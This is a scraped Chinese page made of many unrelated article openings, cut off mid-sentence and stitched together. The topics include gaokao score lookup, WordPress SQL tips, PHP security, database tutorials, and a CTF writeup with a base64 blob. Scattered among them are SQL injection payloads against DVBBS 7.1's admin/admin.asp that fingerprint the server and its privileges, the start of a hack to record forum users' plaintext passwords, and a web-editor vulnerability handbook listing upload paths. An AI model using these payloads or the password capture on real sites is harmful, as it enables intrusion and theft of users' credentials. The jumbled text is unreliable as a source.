用vnp查成绩,但是高考成绩账号密码忘了了,试了几次系统说尝试突破,被系统锁定怎么办

动网先锋论坛,凭借其强大全面的功能,再加上它免费提供给个人用户,在网络众多论坛中,独树一帜.很多人都把它作为自己论坛的最佳首选.但是新版本的论坛,对用户密码采用了不可逆的MD5加密,即使是管理员,也无法查询到个人用户的密码.再数据库中只能查询了加密后的结果. 先描述一下它得登陆过程,用户输入帐号后号,调用MD5函数,输入的密码加密,然后比较存储在数据库的数据和密码加密的结果是否相同.如果相同,登陆成功,将个人信息保存在COOKIE中. 现在我们要自己动手,为论坛增加一项记录密码的功能. 查看它登
2008年全国各地区高考成绩公布时间及查询方式 地区名称 出分时间 成绩查询 北京 6月20日 1.登录北京教育考试院网站:www.bjeea.cn 2.拨打免费声讯电话9查询 天津 6月25日左右 1.168声讯:3888 2.登录天津招考资讯网 河北 6月23日左右 1.拨打168信息台: 2.登录河北教育考试查询网:河北省教育考试院 山西 6月25日左右 一是通过山西省招生考试网查询: 二是通过168信息台查询: 三是
本人是非常相信&功夫熊猫1&中的思想的:只要有勇气并掌握了学习方法,什么困难都能解决,而学外语尤其需要这两样东西,甚至只需要这两样东西. 本文是IT职场人生系列的第七篇.(之一,之二,之三,之四,之五,之六,之七,之八,之九) 在很多时候可能程序员最困惑的是:我不过是要编编程序而已,犯得上学好外语吗?答案是犯得上,总有一天有可能会和老外打交道的,外国客户,外国老板,外国专家--或者学习一种还没被翻译过来的技术,为一个百度不到的错误Google--当然第二个问题是:就不能不打交道吗?怎么说呢,我
为所有文章和页面添加自定义字段 这段代码可以为WordPress数据库内所有文章和页面添加一个自定义字段. 你需要做的就是把代码中的'UniversalCutomField'替换成你需要的文字,然后把'MyValue'改成需要的值. INSERT INTO wp_postmeta (post_id, meta_key, meta_value) SELECT ID AS post_id, 'UniversalCustomField' AS meta_key 'MyValue AS meta_val
当我们还没来得及感叹网上银行的快捷与便利,病毒与黑客的不断得逞就已经把许多用户吓了好一哆嗦.难道说享受便捷的生活就一定要用自身的安全来交换吗? [用户篇]不要和陌生人说话 案件回放 日,网友小姚在一个名为&利好交易网&的网站上,点击进入了工商银行网上支付系统,他在输入了自己的卡号和密码后却无法登录.好在小姚及时地发现这个工行网站和去年被媒体所曝光的那个假网站非常相似,并迅速赶往附近的工行,取出卡里的大部分钱,只留下71元.几个小时后,当小姚再次查询余额时,发现卡里除了
从05年做第一个动漫论坛的时候,我就喜欢倒腾论坛插件.记得当时用的DVBBS的程序,在上面装了不少各种偏娱乐性质的插件,最有意思的是&结婚&的插件,比现在28推上的结婚插件还要完善,记得当时在论坛上前后娶过3个&老婆&. 一个论坛能做起来,好的内容和推广很重要,一些好的插件对论坛运营的辅助也是非常的大.今天主要是跟大家分享我做28推论坛这1年多的时间里,对使用一些论坛插件的感受,给大家推荐几款我个人觉得还不错的.因为我用的disucz的程序,所以今天推荐的也都是支持
测试的时候,首先需建立这个文件username.txt且里面写入用户名(用户明以&:&分开),将文件放在相同目录文件中访问即可. &!DOCTYPE html PUBLIC &-//W3C//DTD XHTML 1.0 Transitional//EN& &http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&& &html xmlns=&http://www.
第一讲:&纸上谈兵:我们需要在本地架设注入环境,构造注入语句,了解注入原理.&: 第二讲:&实战演练:我们要在互联网上随机对网站进行友情检测,活学活用,举一反三&: 第三讲:&扩展内容:挂马,提权,留门.此讲内容颇具危害性,不予演示.仅作概述&. 这个主题涉及的东西还是比较多的,结合我们前期所学.主要是让大家切身体会一下,管中窥豹,起到知己知彼的作用.千里之堤溃于蚁穴,以后进入单位,从事相关程序开发,一定要谨小慎微. 问:大家知道骇客们攻击网站主
最新的Yosemite系统有很多熟悉的功能,但仍有一些很不一样的特征,其中10种特性会改变使用Mac的方式. Mac也是一部手机 如果Mac和iPhone处于同样的WiFi网络中,用户可以通过Mac发送并接收短信.彩信和iMessage,还能打电话. 从OS X Mountain Lion开始,无论在iOS设备或Mac都能和其他iOS用户发送iMessages,而FaceTime(2010年推出)让我们可以在这两个平台上进行视频通话.在Yosemite上,只要Mac和iPhone都处于相同的Wi
花了这么多时间最终还是回到了数据库,但是数据库中一张一张的表格找不到脚本,也不是自己设计的数据库,完全没有一点头绪,后来突然想起来sql有个数据库关系图,可以很快的适合数据库程序员很快的掌握数据库表之间的关系 很久以前就知道微软的Petshop的很经典,昨天抽出时间去学习,一开始还真的不适应,什么成员资格,还真的看不太懂,运行petshop想从登陆学起,但是用户名和密码都不知道,后来发现有更注册的页面,自己注册了一个页面,才发现还得从数据库出发.花了这么多时间最终还是回到了数据库,但是数据库中一
这篇文章主要介绍了python操作sqlite3打开数据库.删除.修改示例,需要的朋友可以参考下 #coding=utf-8 __auther__ = 'xianbao' import sqlite3 # 打开数据库 def opendata(): conn = sqlite3.connect(&mydb.db&) cur = conn.execute(&&&create table if not exists tianjia( id integer pr
WordPress将其所有信息片段(包括文章.页面.评论.博客链接.插件设置等)存储在MySQL数据库中. 虽然WordPress用户可以通过网站后台编辑控制以上信息片段 不过假设你的WordPress网站上有成百上千篇文章,而你需要进行全站范围的改动, 这时从后台逐条编辑就有点费时费力了,并且犯错的几率也会提高. 最好的方法是进入WordPress的MySQL数据库执行必要的查询(改动). 通过MySQL可以迅速地完成以上任务,为你节省更多时间. 下面要介绍的就是一些省时省力的WordPres
漏洞测试环境:DVBBS7.1 SQL 受影响文件 admin/admin.asp ..... 漏洞利用 (select @@version)&0 获得Windows的版本号 and user_name()='dbo' 判断当前系统的连接用户是不是sa (select user_name())&0 爆当前系统的连接用户 (select db_name())&0 得到当前连接的数据库 (select IS_MEMBER('db_owner')) --查询数据库当前用户权限 (select
通过启用php.ini配置文件中的相关选项,就可以将大部分想利用SQL注入漏洞的骇客拒绝于门外 通过启用php.ini配置文件中的相关选项,就可以将大部分想利用SQL注入漏洞的骇客拒绝于门外. 开启magic_quote_gpc=on之后,能实现addslshes()和stripslashes()这两个函数的功能.在PHP4.0及以上的版本中,该选项默认情况下是开启的,所以在PHP4.0及以上的版本中,就算PHP程序中的参数没有进行过滤,PHP系统也会对每一个通过GET.POST.COOKIE方
常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor,使用这类编辑器的朋友一定要注意下. FCKeditor FCKeditor编辑器页/查看编辑器版本/查看文件上传路径 FCKeditor编辑器页 FCKeditor/_samples/default.html 查看编辑器版本 FCKeditor/_whatsnew.html 查看文件上传路径 fckeditor/editor/filemanager/browser/default/connectors/asp/connec
QueryCache(下面简称QC)是根据SQL语句来cache的.一个SQL查询如果以select开头,那么MySQL服务器将尝试对其使用QC.每个Cache都是以SQL文本作为key来存的. 原理 QueryCache(下面简称QC)是根据SQL语句来cache的.一个SQL查询如果以select开头,那么MySQL服务器将尝试对其使用QC.每个Cache都是以SQL文本作为key来存的.在应用QC之前,SQL文本不会被作任何处理.也就是说,两个SQL语句,只要相差哪怕是一个字符(例如大小写
SQL 注入是PHP应用中最常见的漏洞之一.事实上令人惊奇的是,开发者要同时犯两个错误才会引发一个SQL注入漏洞 一个是没有对输入的数据进行过滤(过滤输入),还有一个是没有对发送到数据库的数据进行转义(转义输出).这两个重要的步骤缺一不可,需要同时加以特别关注以减少程序错误. 对于攻击者来说,进行SQL注入攻击需要思考和试验,对数据库方案进行有根有据的推理非常有必要(当然假设攻击者看不到你的源程序和数据库方案),考虑以下简单的登录表单: &form action=&/login.php&q
在从单纯的搜索服务提供商向内容提供商角色延伸的过程中,Google的Knol正变得越来越引人注目,这也意味着,目前全球最大的网络百科全书--维基百科(wikipedia)面临挑战 虽然早在半年前Google就声称要推出Knol服务,但进展缓慢的测试并没有让业界过多放在心上,而现在,Google终于来了. 7月23日,Google宣布结束长达半年之久的公司内部测试,Knol正式上线,拥有Google账号的任何网民都可以登录这部百科全书查阅资料或创建词条.Knol的主题涵盖非常广泛,从科学概念.医学
本书起因 写本书源于我一次做培训的经历,学生大多是计算机专业的学生或有过一定经验的在职开发者.他们都知道类.方法.构造方法.甚至抽象类.接口等概念,并用Visual Studio写过不少的Windows或Web程序,可是当我提问为什么要用面向对象,它的好处在哪里时,却没有人能完整地讲得出来,多数人的反应是,概念知道的,就是表达不清楚. 针对于此,我就举了中国古代的四大发明中活字印刷的例子(见第1章),通过一个虚构的三国曹操做诗的情景,把面向对象的几大好处讲解了一下,学生普遍都感觉通俗易懂,觉得这
Stack Overflow是一个专门面向编程Q&A的网站,尽管目前仍然是beta版,但已正式上线.这个网站为程序员提供了一个自由问答的空间,旨在成为能够查找到所有编程问题答案的源泉. Stack Overflow是一个非常简洁的网站,它只有一个目标,那就是保存所有可能的编程问题和网友提供的解答.该项目的创建者这样描述Stack Overflow: Stack Overflow是一个专门面向程序员的协作编辑的Q&A网站,不限平台,不限语言. 这个网站的创建者之一--Joel Spolsky
注:本文来自友盟-安卓巴士教程大赛第一名获奖作品,作者安卓巴士的ID为liupeinye.推荐给所有刚刚开始接触Android开发的朋友们! 本文面向Android初级开发者,有一定的Java和Android知识即可. 文章覆盖知识点:HttpWatch抓包,HttpClient模拟POST请求,Jsoup解析HTML代码,动态更新ListView 背景介绍:客户端(Client)或称为用户端,是指与服务器相对应,为客户提供本地服务的程序.而android系统上的90%客户端软件都有一个共性,就
SQL 注入 很多 web 开发者没有注意到 SQL 查询是可以被篡改的,因而把 SQL 查询当作可信任的命令.殊不知道,SQL 查询可以绕开访问控制,从而绕过身份验证和权限检查.更有甚者,有可能通过 SQL 查询去运行主机操作系统级的命令. 直接 SQL 命令注入就是攻击者常用的一种创建或修改已有 SQL 语句的技术,从而达到取得隐藏数据,或覆盖关键的值,甚至执行数据库主机操作系统命令的目的.这是通过应用程序取得用户输入并与静态参数组合成 SQL 查询来实现的.下面将会给出一些真实的例子. 由
熟悉我的朋友应当知道,近些年的大部分时间我的工作都会多少和 PHP 相关.随着 PHP 有着越来越深入的了解,以及遇到越来越多的不同业务时,使用 PHP 总会让我有一种莫名的无力感.当然,并不是我一个人在使用 PHP 的时候遇到了问题.事实上,每个略微有一些经验,接触过一些需求的人都会有同样的困惑.各种配合 LAMP(或者LNMP?)架构的后端技术也因此被发明或被发现,进而整合到 PHP 的开发的技术体系中.从简单的Memcached作为数据中转,cron 后端定时处理:到 Gearman.Ra
登录: 成功后设置cookie //设置cookie ssetcookie('auth', authcode(&$setarr[password]\t$setarr[uid]&, 'ENCODE'), $cookietime); ssetcookie('loginuser', $passport['username'], ); ssetcookie('_refer', ''); 其中我用到最重要的是:api/uc.php文件中 function synlogin($ge
日常记录,代码是根据SpringSecurity写的. 写个Entity类实现UserDetails package com.lqz.b2c.base.web.controller.member. import com.lqz.b2c.base.entity.P import com.lqz.base.auth.UsernameNotFoundE import com.lqz.base.auth.userdetails.UserD
2013下半年可以算是web入门的学习.也是第一次沉下心来学习一门语言. php方面学了thinkphp框架,学了抽象,继承,多态,接口,文件操作,缓存. mysql学了优化查询的几种常见方法,学了多表关联查询. css 学习了布局. javescript学了dom操作. 迈入2014,希望能找到好工作,学习更多的东西.
1.yum安装mysql [root@stonex ~]# yum -y install mysql-server 安装结果: Installed: mysql-server.x86_64 0:5.1.73-3.el6_5 Dependency Installed: mysql.x86_64 0:5.1.73-3.el6_5 perl-DBD-MySQL.x86_64 0:4.013-3.el6 perl-DBI.x86_64 0:1.609-4.el6 2.设置开机启动 [root@stone
体验目标:尚德机构-嗨学网www.highso.org.cn 体验流程:用户体验大致流程 1 首页 在1M网络条件下,使用最快的浏览器Chrome直接访问域名www.highso.org.cn跳转到嗨学网http://highso.cn/,得到的体验不太好,第一屏的大图片很难加载完成.如图1.0 图1.0 加载完成后的首页,如图1.1 图1.1 打开首页差不多5秒.本地Ping了一下,如下: 图1.2 很抱歉,刚好出问题的时候被我抓住了.经过反复测试Ping,速度基本保持在30ms内. 首页在3
我于日周六的上午在微博.twitter.CoolShell上发布了一个和程序员有关的解谜题的活动--[活动]解谜题送礼物.我使用了二级域名fun.coolshell.cn做为这次活动的页面. 截止这篇文章发布的时候,fun.coolshell.cn的访问量UV大约有4万左右,通关人数大约有200人,但因为在活动的第二天网上就出了一些答题攻略,通过分析,实际靠自己能力通过的人数在130人左右.通过率大约不到4‰的样子. 在这里我把整个谜题和做这个活动的东西写一下,算是给自己的一个总
有个小项目中,用到了linq to sql,既然这样,想必需要做多条件组合查询了,虽然我对表达式树的研究也只是寥寥地,但除此方法,似乎别无他法,只好硬着头皮研究一下. 本篇适合于规模较小的数据量,对于大数据量,需要用另外的方式,见下一篇 首先,从网上搜,是必不可少的,大概了解了一下linq 多条件组合查询的方向,就开始动手了,首先,写一个委托的方法: private bool GetCondition(FeedBack fb) { bool boolResult = int f_ty
一个在黑客界引起轰动的菜鸟教材---跟我学编程系列 跟我学编程系列 原黑白新区记忆碎片的帖子!转贴上来,供大家学习!!! 发现大部分黑白的朋友都不会编程, 这可不是件好事, 所以这次我就写了一个简单的编程教程, 讲一下VBScript. 主要面向菜鸟, 懂得编程的朋友就不要浪费时间了, 如果你想接触以下VBScript也可以, 但既然有编程基础推荐直接去找一些参考书来读, 会比较快. 什么是VBScript呢? VBScript的全称是:Microsoft Visual Basic Script
Oracle常见数据库操作总结: 1.查询一个数据库中所有的表名 select table_name from all_tables where owner='用户名'; 2.orcale中显示表结构 describe 表名 或者 desc 表名(与mysql相同) 3.查询当前数据名 方法一:select name from v$ (只显示当前数据库名) 方法二:show parameter db (显示当前数据库的一些参数) 4.查询当前数据库实例名 方法一:select
密码管理与设定: 再来跟大家提一提那个重要的密码概念!您得要特别留意的是,今天,您的主机若是遭到入侵,对方的第一个入侵点自然就是您主机上面账号的『密码』了,所以,如果您的密码定义的比较严格的话,那么自然对方就不容易猜到你的密码,自然就会比较有保障啦! 目前一些 Cracker 较常使用的密码破解软件,大抵是『字典攻击法』及所谓的『暴力攻击法』,就字面上的意义来说,『字典攻击法』是将字典里面所查的到的任何单字或词组都输入的程序中,然后使用该程序一个一个的去尝试破解你的密码,不要觉得这样的速度似乎很
前言 本文总结了一些优质的前端面试题(多数源于网络),初学者阅后也要用心钻研其中的原理,重要知识需要系统学习,透彻学习,形成自己的知识链.万不可投机取巧,只求面试过关是错误的! 面试有几点需注意:(来源程劭非老师 github:@wintercn) 面试题目: 根据你的等级和职位变化,入门级到专家级:范围↑.深度↑.方向↑. 题目类型: 技术视野.项目细节.理论知识题,算法题,开放性题,案例题. 进行追问: 可以确保问到你开始不懂或面试官开始不懂为止,这样可以大大延展题目的区分度和深度,知道你的
在之前的这篇文章 在ExpressJS(NodeJS)中设置二级域名跨域共享Cookie中提及将Session存放到Mongodb中,其中有很多讲解的不是很详细. 我们为什么要把Session存放到数据中,以及又为什么要在子域名间跨域共享Cookie呢? Session与Cookie的关系 客户端与服务会使用一个Sessionid的Cookie值来进行客户端和服务器端会话的匹配,这个Cookie一般是服务器端读/写的,并在Http请求响应的Header中的Set-Cookie属性设置: HTTP
一些对初学者非常有用的练习,及练习的答案.希望可以给初学者一些帮助 1学生表student S#学号,sname姓名,difdate日期,班级grade 2课程表 course c#课程号 ,名字cname 3成绩单score s#学号 c#课程号 成绩score --1统计每个班级有多少人 select grade,count(sname) from ze_st --2.2007级的各学生的平均成绩 没有成绩的为0: select a.sname,(s
前面我们讲述了使用python操作数据库,今天我们来更进一步,介绍下python查询.更新数据库的相关操作.有需要的小伙伴自己参考下吧. 回顾一下已有的战果:(1)连接数据库;(2)建立指针:(3)通过指针插入记录:(4)提交将插入结果保存到数据库.在交互模式中,先温故,再知新. &&& #导入模块 &&& import MySQLdb &&& #连接数据库 &&& conn = MySQLdb.connect(host=&
这篇文章主要是总结asp.net开发人员在面试过程中常遇到的一些问题小结,需要的朋友可以参考下 1. 简述 private. protected. public. internal 修饰符的访问权限. 答 . private : 私有成员, 在类的内部才可以访问. protected : 保护成员,该类内部和继承类中可以访问. public : 公共成员,完全公开,没有访问限制. internal: 在同一命名空间内可以访问. 2 .列举asp.net 页面之间传递值的几种方式. 答. 1.使用
在上一篇中,我们做了基于linq to sql 的多条件组合查询,但通过监视数据库发现,这样做的成本比较高,每次都要取出全部的数据到内存进行筛选. 如何从真正意义上做到延迟加载,即一次只从数据库中取我们需要的用到的那部分数据呢.通过研究,有了下面的方法: 首先,我们要新建一个静态类,用于存放多条件组合查询的各种组合,比如or,And这些等等.代码如下: using System.Linq.E public static class PredicateExtensionses
&零基础学SQL Server 2005 电子教程/随书光盘&电子教程/随书光盘[ISO]下载 eMule资源也可以用迅雷下载 下面是用户共享的文件列表,安装eMule后,您可以点击这些文件名进行下载 [零基础学SQL.Server.2005.电子教程/随书光盘].0SQL.Server.2005.iso 详情 12.2MB [零基础学SQL.Server.2005.电子教程/随书光盘].0sql.server2005dianzijiaocheng.rar 详情 52.3MB 中文名称:零基础
这篇文章主要介绍了使用php实现的12306火车票余票查询和价格查询功能,大家参考使用吧 name.php &?php return array( &北京北& =& &VAP&, &北京东& =& &BOP&, &北京& =& &BJP&, &北京南& =& &VNP&, &北京西& =& &
从头开始学代理(新手必读)(转帖) (一梦浮生) 扫盲篇 什么是代理服务器? 代理服务器是介于浏览器和Web服务器之间的一台服务器,当你通过代理服务器上网浏览时,浏览器不是直接到Web服务器去取回网页,而是向代理服务器发出请求,由代理服务器来取回浏览器所需要的信息,并传送给你的浏览器. 什么是免费代理服务器? 在使用代理猎手等软件搜索代理服务器地址时,会在验证状态栏中出现类似&要密码&.&Free&等字样.如果你把&Free&的地址设置为代理服务
先被Yahoo拒绝,又有Google步步紧逼,还被Apple不断蚕食着看上去已经不那么稳固的市场份额,危机重重的微软就像年迈的老者步履蹒跚.尽管不停地在搜索领域投入重金,然而微软的市场份额总是和Google差着一个数量级:在手持设备和娱乐领域也远不及Apple那般光芒四射:Adobe的Flash占据了98%以上的PC装机量,而财大气粗的微软即使与美国独家奥运转播商CBS合作借助奥运行销,使Silverlight作为在线奥运视频的唯一格式,也丝毫无法撼动Flash的统治地位.前沿阵地攻不下来,后院
我的中学政治老师告诉我,历史的发展是呈螺旋式上升的.对历史的辩证和否定之否定,构成了马克思主义最基本的哲学观,互联网的发展也是如此. 最初,我们有博客.后来,我们觉得正儿八经写博客太累,于是我们有了微博.再后来,我们觉得微博太碎片化太肤浅,于是我们有了轻博客.这样的发展确实符合马克思辩证唯物主义思想,但是这是否是一种真正意义上的&上升&呢?如果只是为了解决微博140字无法表达太多内容的问题,那么不限字数的搜狐博客早就应该大红大紫了. 除了轻博客的提法,最近也有人在提轻社区.比如最近原创
事件说明: 众多互联网公司客户注册信息库被黑客盗取后公开 发生此类事件的根源在于web服务器被黑客入侵,最终黑客盗取了大量客户注册信息.其中包括注册邮箱.用户名.密码(多是密文.部分网站是明文) 此类事件与用户电脑本身的安全无关,黑客并没有入侵用户本地的电脑,只是用户在某些网站注册时提交的个人信息存储在网站运营商那里被盗了. 就好比,你的存折银行卡还在手里,但小偷却把银行偷了.这和你家里是不是安全没啥关系. 事件为什么很严重? 原因在于:大量网民不善于管理网络服务密码,而自己需要的网络服务又很多
我自己在学习编程的过途中有的几个疑问,1)什么编程语言我需要学. 2)学多少种才算可以.最后通过我自己学习感受和对其他编程高手(主要是新闻组)的请教,我认为找到了满意我的答案.抛砖引玉,做个参考吧. 对于初学者,我建议从 python 开始学.因为它在语言设计上很整洁,帮助文件也很全面.而且也是 object-oriented (O-O),尽管我把它作为一个初学者开始的语言,并不代表它的用处和功能不强大.实际上它是个功能强大,可以用来做大的编程工程的语言. 我知道国内对 python 可能还不了
近段时间,不断有陌生的QQ来加我.好奇询问后,才发觉尽是些熟人的朋友.他们来自不同的省份,却有着相同的目标--准备冲击中国传媒大学.而加我的用意,无非是想从一位刚刚走考研路的师兄处得一些所谓的成功经验. 师弟师妹们及早准备的意识,让我这个做师兄的自愧弗如.说也惭愧,一年前自己准备冲研时,大多时间只是处于懵懂的状态,非但没有四处寻觅&过来人&的意识,连&考研论坛&这个基本平台,也是上年6月份才从室友口中第一次得知,其消息之闭塞,观念之落后,思想之愚顽,可见一斑. 言归
系列文章目录索引:&设计密码& 第二章: 如何选择设计公司 经历过青春80年代的我们,到了1990之后,自然而然都变成了愤青一族,混沌于超越现实的理想和现实残酷的时代之间.我们因为热爱青春而丢失青春,因为迷信理想而与理想分手,在最需要坚持的年代里,很多像我这样骨子里有点投机分子倾向的人,纷纷加入了1996年底的&青春大逃亡&,争先恐后地抛弃理想,投入尘世的怀抱.但当你回到尘世之后,这才发现世界变化快,自己已经什么都不会了,电脑.外语.汽车这些80年代根本不重要的东西,成了敲
公民身份信息核查系统已向公民个人开通.这一便民措施广被热捧也带来争议,相关专家对其中最受人关注的隐私保护问题.肖像权问题和每次5元的查询费问题作了分析. 专家指出,在香港和多数欧美国家,立法规定,查询个人信息一般需经本人(即信息主体)同意,而在中国,尚缺一部个人信息保护法. 11月7日上午,公安部全国公民身份证号码查询服务中心面向公民个人推出公民身份信息核查网上自助服务.每次查询收费5元,可以通过姓名.身份证号码和手机号,查出三者是否&一致&. 此举成为舆论焦点,但11月8日,该网站登
看到有朋友催促啦,赶快上第二盆菜,希望合您口胃哦,有什么建议或意见也欢迎大家多多留言讨论啦,没尝过第一盆菜请先点击这里: sql多表查询之一:Where 和 On的秘密 今天我们要介绍的是sql多表查询不等连接,想知道怎么样用一句SQL得到每日的库存结余吗,那么你千万不要错过今天的内容! 可能有朋友要问了,什么是不等连接呢? 通常来说,SQL语言进行的都是无序操作.想要进行有序的处理,比如比较一个序列的前后项,必须要使用游标.但是,在有些场合下,可采用另一种方法,不用游标,一样能处理有序的信息,
Copyright (C) , All Rights Reserved.
版权所有 闽ICP备号
processed in 0.081 (s). 11 q(s)Access To Website Blocked且随疾风前行, 身后已是流星
CTF writeup 1_网络安全实验室
1.key在哪里?
“key就在这里中,你能找到他吗? ”
看看源代码有没有线索~果然
http-equiv="content-type" content="text/charset=utf-8"&
key就在这里中,你能找到他吗?
key不知道被谁加密了:)
2.再加密一次你就得到key啦~
加密之后的数据为xrlvf23xfqwsxsqf
3.猜猜这是经过了多少次加密?
加密后的字符串为:
Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVmpBeFYyS
kVUbGhoTVVwVVZtcEJlRll5U2tWVWJHaG9UVlZ3VlZacVFtRlRNbEpJVm10a1dHSkdjRTlaVj
NSR1pVWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1drWnd
WMDFFUlRGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm1wT1QwMHhjRlpYYlhSWFRWaENSbFpYZUZO
VWJVWTJVbFJDVjAxdVVuWlZha1pYWkVaT2NscEdhR2xTTW1ob1YxWlNTMkl4U2tkWGJHUllZb
FZhY1ZadGRHRk5SbFowWlVaT1ZXSlZXVEpWYkZKSFZqRmFSbUl6WkZkaGExcG9WakJhVDJOdF
JraGhSazVzWWxob1dGWnRNWGRVTVZGM1RVaG9hbEpzY0ZsWmJGWmhZMnhXY1ZGVVJsTk5XRUp
IVmpKNFQxWlhTa2RqUm14aFUwaENTRlpxUm1GU2JVbDZXa1prYUdFeGNHOVdha0poVkRKT2RG
SnJhR2hTYXpWeldXeG9iMWRHV25STldHUlZUVlpHTTFSVmFHOWhiRXB6WTBac1dtSkdXbWhaT
VZwaFpFZFNTRkpyTlZOaVJtOTNWMnhXYjJFeFdYZE5WVlpUWVRGd1YxbHJXa3RUUmxweFVtMU
dVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS1QyUkdTbkpoUjJoVFlYcFdlbGRYZUc
5aU1XUkhWMjVTVGxOSFVuTlZha0p6VGtaVmVXUkhkRmhTTUhCSlZsZDRjMWR0U2tkWGJXaGFU
VzVvV0ZsNlJsZGpiSEJIV2tkc1UySnJTbUZXTW5oWFdWWlJlRmRzYUZSaVJuQlpWbXRXZDFZe
GJISlhhM1JVVW14d2VGVXlkR0ZpUmxwelYyeHdXR0V4Y0hKWlZXUkdaVWRPUjJKR2FHaE5Wbk
J2Vm10U1MxUnRWa2RqUld4VllsZG9WRlJYTlc5V1ZscEhXVE5vYVUxWFVucFdNV2h2VjBkS1d
WVnJPVlpoYTFwSVZHeGFZVmRGTlZaUFYyaHBVbGhCZDFac1pEUmpNV1IwVTJ0b2FGSnNTbGhV
VlZwM1ZrWmFjVk5yWkZOaVJrcDZWa2N4YzFVeVNuSlRiVVpYVFc1b1dGZFdXbEpsUm1SellVW
lNhVkp1UWxwV2JYUlhaREZaZUdKSVNsaGhNMUpVVlcxNGQyVkdWbGRoUnpsb1RWWndlbFl5Y0
VkV01ERjFZVWhLV2xaWFVrZGFWM2hIWTIxS1IyRkdhRlJTVlhCS1ZtMTBVMU14VlhoWFdHaFl
ZbXhhVjFsc1pHOVdSbXhaWTBaa2JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa2Q0YTFO
R1ZuTlhiRlpYWWtoQ1NWWkdVa2RWTVZwMFVtdG9VRll5YUhCVmJHaERUbXhrVlZGdFJtcE5WM
Ul3VlRKMGIyRkdTbk5UYkdoVlZsWndNMVpyV21GalZrNXlXa1pPYVZKcmNEWldhMk40WXpGVm
VWTnVTbFJpVlZwWVZGYzFiMWRHWkZkWGJFcHNVbTFTZWxsVldsTmhWa3AxVVd4d1YySllVbGh
hUkVaYVpVZEtTVk5zYUdoTk1VcFZWbGN4TkdReVZrZFdXR3hyVWpOU2IxbHNWbmRXTVZwMFkw
ZEdXR0pHY0ZoWk1HUnZWMnhhV0ZWclpHRldWMUpRVlRCVk5WWXhjRWhoUjJoT1UwVktNbFp0T
VRCVk1VMTRWVmhzVm1FeVVsWlpiWFIzWVVaV2RHVkZkR3BTYkhCNFZrY3dOVll4V25OalJXaF
lWa1UxZGxsV1ZYaFhSbFoxWTBaa1RsWXlhREpXTVZwaFV6RkplRlJ1VmxKaVJscFlWRlJHUzA
1c1drZFZhMlJXVFZad01GVnRkRzlWUmxwMFlVWlNWVlpYYUVSVk1uaGhZekZ3UlZWdGNFNVdN
VWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp1Y0Zka2JGbDNWMjVLYkZKdFVubGFSV1IzWVZaY
WNtTkZiRmRpUjFFd1ZrUktSMVl4VGxsalJuQk9UVzFvV1ZkV1VrZGtNa1pIVjJ4V1UySkdjSE
5WYlRGVFRWWlZlV042UmxoU2EzQmFWVmMxYjFZeFdYcGhTRXBWWVRKU1NGVnFSbUZYVm5CSVl
VWk9WMVpHV2xaV2JHTjRUa2RSZVZaclpGZGlSMUp2Vlc1d2MySXhVbGRYYm1Sc1lrWnNOVmt3
Vm10V01ERkZVbXBHV2xaWGFFeFdNbmhoVjBaV2NscEhSbGROTW1oSlYxUkplRk14U1hoalJXU
mhVbFJXVDFWc2FFTlRNVnAwVFZSQ1ZrMVZNVFJXYkdodlYwWmtTR0ZHYkZwaVdHaG9WbTE0Yz
JOc2NFaFBWM0JUWWtoQ05GWnJZM2RPVmxsNFYyNVNWbUpIYUZoV2FrNU9UVlphV0dNemFGaFN
iRnA1V1ZWYWExUnRSbk5YYkZaWFlUSlJNRmRXV2t0ak1WSjFWRzFvVTJKR2NGbFhWM2hoVW0x
UmVGZHVSbEppVlZwaFZtMHhVMU5XV2xoa1J6bG9UVlZ3TUZsVldsTldWbHBZWVVWU1ZrMXVhR
2haZWtaM1VsWldkR05GTlZkTlZXd3pWbXhTUzAxSFNYbFNhMlJVWW1zMVZWbHJaRzlXYkZwMF
pVaGtUazFXYkROV01qVkxZa1pLZEZWdWJHRlNWMUl6V1ZaYVlXTnRUa1ppUm1ScFVqRkZkMWR
XVWt0U01WbDRWRzVXVm1KRlNsaFZiRkpYVjFaYVIxbDZSbWxOVjFKSVdXdG9SMVpIUlhoalNF
NVdZbFJHVkZZeWVHdGpiRnBWVW14a1RsWnVRalpYVkVKaFZqRmtSMWRZY0ZaaWEzQllWbXRXW
VdWc1duRlNiR1JxVFZkU2VsbFZaSE5XTVZwMVVXeEdWMkV4Y0doWFZtUlNaVlphY2xwR1pGaF
NNMmg1VmxkMFYxTXhaRWRWYkdSWVltMVNjMVp0TVRCTk1WbDVUbGQwV0ZKcmJETldiWEJUVjJ
zeFIxTnNRbGROYWtaSFdsWmFWMk5zY0VoU2JHUk9UVzFvU2xZeFVrcGxSazE0VTFob2FsSlhh
SEJWYlRGdlZrWmFjMkZGVGxSTlZuQXdWRlpTUTFack1WWk5WRkpYWWtkb2RsWXdXbXRUUjBaS
FlrWndhVmRIYUc5V2JYQkhZekpOZUdORmFGQldiVkpVV1d4b2IxbFdaRlZSYlVab1RXdHdTVl
V5ZEc5V2JVcElaVWRvVjJKSFVrOVVWbHB6VmpGYVdXRkdhRk5pUm5BMVYxWldZV0V4VW5SU2J
rNVlZa1phV0ZsVVNsSk5SbFkyVW10MGFrMVlRa3BXYlhoVFlWWktjMk5HYkZoV00xSm9Xa1JC
TVdNeFpISmhSM2hUVFVad2FGWnRNSGhWTVVsNFZXNU9XR0pWV2xkVmJYaHpUbFpzVm1GRlRsZ
GlWWEJKV1ZWV1QxbFdTa1pYYldoYVpXdGFNMVZzV2xka1IwNUdUbFprVGxaWGQzcFdiWGhUVX
pBeFNGTlliRk5oTWxKVldXMXpNVlpXYkhKYVJ6bFhZa1p3ZWxZeU5XdFVhekZYWTBoc1YwMXF
Sa2haVjNoaFkyMU9SVkZ0UmxOV01VWXpWbTF3UzFNeVRuTlVia3BxVW0xb2NGVnRlSGRsVm1S
WlkwVmtWMkpXV2xoV1J6VlBZVlpLZFZGck9WVldla1oyVmpGYWExWXhWbkphUjNST1lURndTV
